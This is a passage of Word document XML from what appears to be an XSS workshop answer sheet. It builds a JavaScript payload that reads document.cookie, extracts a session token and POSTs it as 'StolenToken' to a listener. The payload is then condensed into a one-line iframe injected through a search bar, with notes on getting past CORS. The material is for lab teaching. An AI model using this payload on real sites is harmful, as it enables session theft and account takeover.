      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036DA0BF" w14:textId="77777777" w:rsidR="00AB2C91" w:rsidRPr="00AB2C91" w:rsidRDefault="00AB2C91" w:rsidP="00AB2C91">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FBC823A"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//set URL + open a POST request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDC9F73"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 xml:space="preserve">var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 'http://localhost:8000</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="33DDB0FB" w14:textId="77777777" w:rsidR="00AB2C91" w:rsidRPr="00AB2C91" w:rsidRDefault="00AB2C91" w:rsidP="00AB2C91">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">('POST', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADB5B7B" w14:textId="77777777" w:rsidR="00AB2C91" w:rsidRPr="00AB2C91" w:rsidRDefault="00AB2C91" w:rsidP="00AB2C91">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C5176C5"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//get the current cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C462B6C"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 xml:space="preserve">var cookie = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFCAF7E" w14:textId="77777777" w:rsidR="00AB2C91" w:rsidRPr="00AB2C91" w:rsidRDefault="00AB2C91" w:rsidP="00AB2C91">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AE545C6"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//parse the token from the cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B27DF8"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 xml:space="preserve">var token = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cookie.substring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cookie.indexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>('token=') + 6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1297600C" w14:textId="77777777" w:rsidR="00AB2C91" w:rsidRPr="00AB2C91" w:rsidRDefault="00AB2C91" w:rsidP="00AB2C91">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="544C74BD" w14:textId="77777777" w:rsidR="00AB2C91" w:rsidRPr="00AB2C91" w:rsidRDefault="00AB2C91" w:rsidP="00AB2C91">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//set the request type (unrelated to the exploit, but necessary for telling the server how to handle the request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14276256" w14:textId="77777777" w:rsidR="00AB2C91" w:rsidRPr="00AB2C91" w:rsidRDefault="00AB2C91" w:rsidP="00AB2C91">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http.setRequestHeader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>('Content-Type', ''application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F43164" w14:textId="77777777" w:rsidR="00AB2C91" w:rsidRPr="00AB2C91" w:rsidRDefault="00AB2C91" w:rsidP="00AB2C91">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4417B35A" w14:textId="2698741B" w:rsidR="00AB2C91" w:rsidRPr="00AB2C91" w:rsidRDefault="00AB2C91" w:rsidP="00AB2C91">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">//send a request to </w:t>
      </w:r>
      <w:r w:rsidR="00BB3D8B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3E5968" w14:textId="6990E8AD" w:rsidR="001516F3" w:rsidRDefault="00AB2C91" w:rsidP="00AB2C91">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JSON.stringify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>({'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StolenToken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB2C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>':token}));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B8E6BB" w14:textId="77777777" w:rsidR="00DB2B93" w:rsidRDefault="00DB2B93" w:rsidP="00AB2C91">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CF952FA" w14:textId="5530C222" w:rsidR="007154FE" w:rsidRDefault="001516F3" w:rsidP="004A1290">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Here we set the URL to be </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="00171B53">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
          </w:rPr>
          <w:t>http://localhost:8000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, which </w:t>
      </w:r>
      <w:r w:rsidR="00EF0C0D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>reflects</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the settings I used when running the Python server – the command to do this is </w:t>
      </w:r>
      <w:r w:rsidRPr="005C53D9">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>python3 simple-python-server.py -l localhost -p 8000</w:t>
      </w:r>
      <w:r w:rsidR="008552BD" w:rsidRPr="005C53D9">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>, using the script linked in the original workshee</w:t>
      </w:r>
      <w:r w:rsidR="00127E9E" w:rsidRPr="005C53D9">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00127E9E">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> If you used a different method for setting up a server, change the URL accordingly!</w:t>
      </w:r>
      <w:r w:rsidR="004A1290">
        <w:t xml:space="preserve"> This code also </w:t>
      </w:r>
      <w:r w:rsidR="00DB2B93">
        <w:t>drops the authorisation header as it is not needed to authenticate against our simple server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF55517" w14:textId="58B215CD" w:rsidR="00A409EE" w:rsidRDefault="006B1FA5" w:rsidP="007154FE">
      <w:r>
        <w:t>As before, we now squeeze this all into one line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404CCB46" w14:textId="77777777" w:rsidR="00651D87" w:rsidRDefault="00651D87" w:rsidP="00FE158E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;iframe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>javascript:var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> http = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(); var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 'http://localhost:8000'; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">('POST', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">); var cookie = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">; var token = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cookie.substring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cookie.indexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">('token=') + 6); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>http.setRequestHeader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>('Content-Type', 'application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JSON.stringify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>({'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StolenToken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00651D87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>':token}));"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A330F70" w14:textId="4EC3D071" w:rsidR="008552BD" w:rsidRDefault="008552BD" w:rsidP="00FE158E">
      <w:r>
        <w:t xml:space="preserve">Here we can see </w:t>
      </w:r>
      <w:r w:rsidR="00262FD4">
        <w:t>the token posted to our server</w:t>
      </w:r>
      <w:r w:rsidR="00B21CEE">
        <w:t xml:space="preserve"> when we paste our payload into the search bar!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3B8B90" w14:textId="77777777" w:rsidR="005C53D9" w:rsidRDefault="008552BD" w:rsidP="005C53D9">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="791F6705" wp14:editId="4A375DD5">
            <wp:extent cx="5731510" cy="15741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574165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9E0AAF" w14:textId="1BB6B532" w:rsidR="00FE158E" w:rsidRDefault="005C53D9" w:rsidP="005C53D9">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Viewing the stolen cookie!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E555509" w14:textId="42FB3137" w:rsidR="00FE158E" w:rsidRDefault="00943787" w:rsidP="00FE158E">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r w:rsidR="00FE158E">
        <w:t xml:space="preserve">Sending this may result in a </w:t>
      </w:r>
      <w:r w:rsidR="006559E5">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="006559E5" w:rsidRPr="006559E5">
        <w:t>Cross-Origin Request Blocked</w:t>
      </w:r>
      <w:r w:rsidR="006559E5">
        <w:t>’ error – this is a security measure built in to modern browsers to stop data being sent to another site (exactly what we’re trying to do!) If you use the Python server I provided</w:t>
      </w:r>
      <w:r w:rsidR="00675FEF">
        <w:t xml:space="preserve"> []</w:t>
      </w:r>
      <w:r w:rsidR="006559E5">
        <w:t xml:space="preserve">, there is a </w:t>
      </w:r>
      <w:r w:rsidR="008C7208">
        <w:t xml:space="preserve">header set on the server that allows </w:t>
      </w:r>
      <w:r w:rsidR="00BE3137">
        <w:t xml:space="preserve">requests from all origins </w:t>
      </w:r>
      <w:r w:rsidR="007F0156">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007F0156" w:rsidRPr="00E13B49">
        <w:rPr>
          <w:rStyle w:val="pl-s1"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
